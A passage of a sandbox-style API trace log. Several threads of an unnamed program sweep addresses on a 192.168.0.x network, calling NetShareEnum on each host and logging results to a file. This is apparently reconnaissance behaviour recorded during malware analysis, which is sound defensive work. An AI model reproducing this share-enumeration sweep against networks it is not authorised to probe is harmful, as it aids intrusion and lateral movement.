lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0088.883] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x555fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x555fc54*=0x10, lpOverlapped=0x0) returned 1 [0088.888] NetShareEnum (in: servername="\\\\192.168.0.40", level=0x1, bufptr=0x555fedc, prefmaxlen=0xffffffff, entriesread=0x555fed4, totalentries=0x555fed0, resume_handle=0x555fecc | out: bufptr=0x555fedc, entriesread=0x555fed4, totalentries=0x555fed0, resume_handle=0x555fecc) returned 0x35 [0144.213] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.89", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0144.213] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.89", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.89", lpUsedDefaultChar=0x0) returned 14 [0144.213] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x555ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.213] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.213] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.213] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x555ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.213] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.213] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.213] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x555fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x555fc54*=0x10, lpOverlapped=0x0) returned 1 [0144.221] NetShareEnum (in: servername="\\\\192.168.0.89", level=0x1, bufptr=0x555fedc, prefmaxlen=0xffffffff, entriesread=0x555fed4, totalentries=0x555fed0, resume_handle=0x555fecc | out: bufptr=0x555fedc, entriesread=0x555fed4, totalentries=0x555fed0, resume_handle=0x555fecc) returned 0x35 [0178.452] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.186", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.452] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.186", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.186", lpUsedDefaultChar=0x0) returned 15 [0178.452] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x555ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.452] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.452] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.452] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x555ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.452] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.452] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.452] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x555fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x555fc54*=0x11, lpOverlapped=0x0) returned 1 [0178.454] NetShareEnum (in: servername="\\\\192.168.0.186", level=0x1, bufptr=0x555fedc, prefmaxlen=0xffffffff, entriesread=0x555fed4, totalentries=0x555fed0, resume_handle=0x555fecc | out: bufptr=0x555fedc, entriesread=0x555fed4, totalentries=0x555fed0, resume_handle=0x555fecc) returned 0x35 [0211.196] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.224", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.196] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.224", cchWideChar=15, lpMultiByteStr=0x1e82fac, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.224", lpUsedDefaultChar=0x0) returned 15 [0211.196] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x555fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x555fc2c*=0x80, lpOverlapped=0x0) returned 1 [0211.475] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x555ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.475] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.475] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.475] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x555ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.475] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.475] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.475] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x555fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x555fc54*=0x11, lpOverlapped=0x0) returned 1 [0211.476] NetShareEnum (in: servername="\\\\192.168.0.224", level=0x1, bufptr=0x555fedc, prefmaxlen=0xffffffff, entriesread=0x555fed4, totalentries=0x555fed0, resume_handle=0x555fecc | out: bufptr=0x555fedc, entriesread=0x555fed4, totalentries=0x555fed0, resume_handle=0x555fecc) returned 0x35 [0257.996] SetEvent (hEvent=0x1dc) returned 1 [0257.996] RtlExitUserThread (Status=0x0) Thread: id = 62 os_tid = 0xc9c [0088.889] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.41", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0088.889] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.41", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.41", lpUsedDefaultChar=0x0) returned 14 [0088.889] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x569ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0088.889] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.889] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0088.889] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x569ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0088.889] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.889] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0088.889] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x569fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x569fc54*=0x10, lpOverlapped=0x0) returned 1 [0088.893] NetShareEnum (in: servername="\\\\192.168.0.41", level=0x1, bufptr=0x569fedc, prefmaxlen=0xffffffff, entriesread=0x569fed4, totalentries=0x569fed0, resume_handle=0x569fecc | out: bufptr=0x569fedc, entriesread=0x569fed4, totalentries=0x569fed0, resume_handle=0x569fecc) returned 0x35 [0144.321] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.100", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0144.322] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.100", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.100", lpUsedDefaultChar=0x0) returned 15 [0144.322] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x569ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.322] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.322] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.322] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x569ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.322] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.322] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.322] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x569fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x569fc54*=0x11, lpOverlapped=0x0) returned 1 [0144.328] NetShareEnum (in: servername="\\\\192.168.0.100", level=0x1, bufptr=0x569fedc, prefmaxlen=0xffffffff, entriesread=0x569fed4, totalentries=0x569fed0, resume_handle=0x569fecc | out: bufptr=0x569fedc, entriesread=0x569fed4, totalentries=0x569fed0, resume_handle=0x569fecc) returned 0x35 [0178.286] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.162", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.286] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.162", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.162", lpUsedDefaultChar=0x0) returned 15 [0178.286] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x569ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.286] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.286] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.286] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x569ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.286] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.286] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.286] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x569fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x569fc54*=0x11, lpOverlapped=0x0) returned 1 [0178.291] NetShareEnum (in: servername="\\\\192.168.0.162", level=0x1, bufptr=0x569fedc, prefmaxlen=0xffffffff, entriesread=0x569fed4, totalentries=0x569fed0, resume_handle=0x569fecc | out: bufptr=0x569fedc, entriesread=0x569fed4, totalentries=0x569fed0, resume_handle=0x569fecc) returned 0x35 [0205.864] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.195", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0205.864] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.195", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.195", lpUsedDefaultChar=0x0) returned 15 [0205.864] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x569ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0205.864] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0205.864] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0205.864] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x569ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0205.864] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0205.864] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0205.864] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x569fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x569fc54*=0x11, lpOverlapped=0x0) returned 1 [0205.869] NetShareEnum (in: servername="\\\\192.168.0.195", level=0x1, bufptr=0x569fedc, prefmaxlen=0xffffffff, entriesread=0x569fed4, totalentries=0x569fed0, resume_handle=0x569fecc | out: bufptr=0x569fedc, entriesread=0x569fed4, totalentries=0x569fed0, resume_handle=0x569fecc) returned 0x35 [0257.972] SetEvent (hEvent=0x1dc) returned 1 [0257.972] RtlExitUserThread (Status=0x0) Thread: id = 63 os_tid = 0xca0 [0089.004] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.50", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0089.004] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.50", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.50", lpUsedDefaultChar=0x0) returned 14 [0089.004] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x57dec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0089.004] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0089.004] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0089.004] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x57dec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0089.004] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0089.004] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0089.004] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x57dfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x57dfc54*=0x10, lpOverlapped=0x0) returned 1 [0089.068] NetShareEnum (in: servername="\\\\192.168.0.50", level=0x1, bufptr=0x57dfedc, prefmaxlen=0xffffffff, entriesread=0x57dfed4, totalentries=0x57dfed0, resume_handle=0x57dfecc | out: bufptr=0x57dfedc, entriesread=0x57dfed4, totalentries=0x57dfed0, resume_handle=0x57dfecc) returned 0x35 [0144.354] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.103", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0144.354] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.103", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.103", lpUsedDefaultChar=0x0) returned 15 [0144.354] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x57dec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.354] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.354] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.354] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x57dec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.354] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.354] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.354] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x57dfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x57dfc54*=0x11, lpOverlapped=0x0) returned 1 [0144.361] NetShareEnum (in: servername="\\\\192.168.0.103", level=0x1, bufptr=0x57dfedc, prefmaxlen=0xffffffff, entriesread=0x57dfed4, totalentries=0x57dfed0, resume_handle=0x57dfecc | out: bufptr=0x57dfedc, entriesread=0x57dfed4, totalentries=0x57dfed0, resume_handle=0x57dfecc) returned 0x35 [0178.383] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.176", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.383] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.176", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.176", lpUsedDefaultChar=0x0) returned 15 [0178.383] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x57dec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.383] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.383] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.383] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x57dec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.383] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", 